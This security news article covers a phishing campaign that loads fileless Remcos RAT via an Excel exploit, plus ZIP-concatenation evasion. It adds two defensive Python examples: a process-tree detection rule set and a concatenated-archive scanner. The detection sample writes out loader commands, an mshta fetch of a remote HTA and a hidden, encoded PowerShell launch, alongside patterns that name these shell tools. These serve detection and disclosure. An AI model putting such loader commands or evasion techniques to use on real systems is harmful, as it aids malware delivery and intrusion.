Excel Exploit Fuels New Wave of Fileless Malware Attacks
Cybersecurity experts have uncovered a phishing campaign distributing a new fileless version of the commercial malware Remcos RAT.
Remcos RAT, which is commonly marketed for remote computer management, “offers buyers a range of advanced features for controlling targeted computers,” explained Fortinet FortiGuard Labs researcher Xiaopeng Zhang in an analysis last week. However, cybercriminals have exploited Remcos to steal sensitive information and gain unauthorized control over victims’ systems.
The attack begins with a phishing email disguised as a purchase order, prompting recipients to open a malicious Microsoft Excel attachment. This Excel file exploits a known remote code execution vulnerability in Microsoft Office (CVE-2017-0199, CVSS score: 7.8) to download and execute an HTML Application (HTA) file (“cookienetbookinetcahce.hta”) from a remote server (“192.3.220[.]22”).
The HTA file is heavily obfuscated, using layers of JavaScript, Visual Basic Script, and PowerShell code to evade detection. Its primary function is to download and run an executable file from the same server, which subsequently launches an obfuscated PowerShell program. The malicious code uses anti-analysis and anti-debugging tactics to further evade detection before ultimately loading Remcos RAT through a process called “process hollowing,” embedding it directly into system memory without leaving a physical file on the disk.
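The chain above (Office document, then a remotely fetched HTA, then an obfuscated PowerShell stage) leaves a recognisable parent/child process trail even when the final payload never touches disk. The following detection logic is an added example, not code from Fortinet or from the campaign analysis: it evaluates Sysmon-style process-creation records (a hypothetical, constructed schema) against a few rules for Office applications spawning script hosts, mshta.exe fetching an HTA over HTTP, and hidden or encoded PowerShell. It assumes the HTA is executed by mshta.exe; the sample events and the 203.0.113.10 address are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Process names involved in the chain described above (Office app -> HTA host -> PowerShell).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Hidden-window and encoded-command switches typical of PowerShell loader stages.
PS_SUSPICIOUS_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    """One process-creation record (Sysmon event ID 1 style; hypothetical schema)."""
    ts: str
    parent_image: str
    image: str
    command_line: str


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event):
    """Return the names of the detection rules a single event triggers."""
    parent, child = basename(event.parent_image), basename(event.image)
    hits = []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if child == "mshta.exe" and URL_RE.search(event.command_line):
        hits.append("mshta_loads_remote_hta")
    if parent == "mshta.exe" and child in {"powershell.exe", "pwsh.exe", "cmd.exe"}:
        hits.append("hta_spawns_shell")
    if child in {"powershell.exe", "pwsh.exe"} and PS_SUSPICIOUS_RE.search(event.command_line):
        hits.append("powershell_hidden_or_encoded")
    return hits


def scan(events):
    """Map each event's timestamp to the rules it triggered; silent events are omitted."""
    findings = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            findings[event.ts] = hits
    return findings


# Constructed sample events: a user opens a spreadsheet, Excel starts its print
# helper (benign), then Excel launches mshta.exe with a remote HTA, which in turn
# starts a hidden, encoded PowerShell process. The address and encoded blob are
# placeholders, not real infrastructure or a real command.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
SAMPLE_EVENTS = [
    ProcessEvent("10:00:01", r"C:\Windows\explorer.exe", OFFICE,
                 r'"EXCEL.EXE" "C:\Users\user\Downloads\PO-2024.xlsx"'),
    ProcessEvent("10:00:05", OFFICE, r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
    ProcessEvent("10:00:09", OFFICE, r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://203.0.113.10/loader.hta"),
    ProcessEvent("10:00:12", r"C:\Windows\System32\mshta.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ=="),
]

if __name__ == "__main__":
    for ts, rules in scan(SAMPLE_EVENTS).items():
        print(ts, ", ".join(rules))
```

The first two events produce no findings, which is the point of keying on the parent/child pair rather than on Excel activity alone: Office applications legitimately start helpers such as splwow64.exe, but they have little reason to start mshta.exe or PowerShell.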
Remcos RAT enables attackers to harvest data and execute commands on the infected system, including collecting system details, managing files, manipulating system services, editing the Windows Registry, capturing clipboard data, altering desktop settings, enabling cameras and microphones, downloading additional payloads, recording the screen, and even disabling keyboard or mouse input.
The disclosure comes as Wallarm reports that attackers are also misusing DocuSign APIs to send convincing fake invoices, tricking users into approving fraudulent payments. By leveraging legitimate DocuSign accounts and templates, the attackers mimic well-known brands like Norton Antivirus, making it harder for users and security tools to identify these as phishing attempts. Once users e-sign these documents, attackers can request payment outside DocuSign or send the signed documents directly to a finance team for payment processing.
Another phishing tactic observed recently involves a method called ZIP file concatenation, which combines multiple ZIP files into one to bypass security tools. This technique exploits variations in how programs like 7-Zip, WinRAR, and Windows File Explorer handle ZIP files, making it easy for attackers to conceal malicious content in seemingly harmless files.
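ZIP concatenation works because a ZIP reader normally locates one End of Central Directory (EOCD) record by searching backwards from the end of the file, so two complete archives glued together are parsed as whichever one a given tool happens to find. The scanner below is an added example, not code from any of the vendors cited on this page: it walks forward over every EOCD record in a byte string, recovers each embedded archive's start offset from the central-directory size and offset fields, and lists the entries of each archive. It assumes plain (non-ZIP64) archives whose central directory immediately precedes the EOCD, and uses Python's zipfile as the stand-in for a single-EOCD reader; the two sample archives are constructed in memory.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # End Of Central Directory record signature
EOCD_FIXED_LEN = 22        # fixed part of the EOCD record; an optional comment follows


def build_zip(entries):
    """Build an in-memory ZIP archive from a {name: bytes} mapping (constructed sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def find_embedded_archives(blob):
    """Return one dict per complete archive found in the blob, scanning every EOCD record.

    Assumes non-ZIP64 archives with the central directory directly before the EOCD.
    """
    archives = []
    pos = 0
    while True:
        idx = blob.find(EOCD_SIG, pos)
        if idx == -1 or idx + EOCD_FIXED_LEN > len(blob):
            break
        # EOCD layout after the signature: disk no., CD disk, entries on disk,
        # total entries, CD size, CD offset (relative to archive start), comment length.
        (_disk, _cd_disk, _n_disk, _n_total, cd_size, cd_offset,
         comment_len) = struct.unpack("<HHHHIIH", blob[idx + 4: idx + EOCD_FIXED_LEN])
        end = idx + EOCD_FIXED_LEN + comment_len
        # The central directory sits directly before the EOCD, and cd_offset is
        # measured from the archive's own first byte, so the archive begins here:
        start = idx - cd_size - cd_offset
        names = []
        if start >= 0:
            try:
                with zipfile.ZipFile(io.BytesIO(blob[start:end])) as zf:
                    names = zf.namelist()
            except zipfile.BadZipFile:
                # A stray signature inside compressed data, or a damaged archive.
                names = ["<unparseable>"]
        archives.append({"start": start, "end": end, "names": names})
        pos = end
    return archives


def is_concatenated(blob):
    """True when more than one complete archive is embedded in the blob."""
    return len(find_embedded_archives(blob)) > 1


def default_reader_view(blob):
    """What a single-EOCD reader (Python's zipfile) reports for the same bytes."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


# Constructed sample: an innocuous-looking archive followed by a second, separate archive.
SAMPLE = build_zip({"invoice.txt": b"Thank you for your order.\n"}) + \
         build_zip({"hidden.txt": b"second archive, invisible to a last-EOCD reader\n"})

if __name__ == "__main__":
    print("single-EOCD reader sees:", default_reader_view(SAMPLE))
    for archive in find_embedded_archives(SAMPLE):
        print(f"archive bytes {archive['start']}-{archive['end']}: {archive['names']}")
    print("concatenated:", is_concatenated(SAMPLE))
```

On the constructed sample, zipfile alone reports only the second archive's entry, while the forward scan reports both archives; a mail gateway or sandbox that unpacks with a single reader will therefore inspect only one of them. Note that scanning for EOCD signatures can hit false positives inside compressed data, which is why each candidate is validated by parsing the slice rather than trusted on the signature alone.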
Finally, a hacker group known as Venture Wolf has been linked to phishing attacks targeting sectors in Russia, including manufacturing, IT, construction, and telecommunications. The group uses MetaStealer, a variant of the RedLine Stealer malware, to gather sensitive data and infiltrate networks in these industries.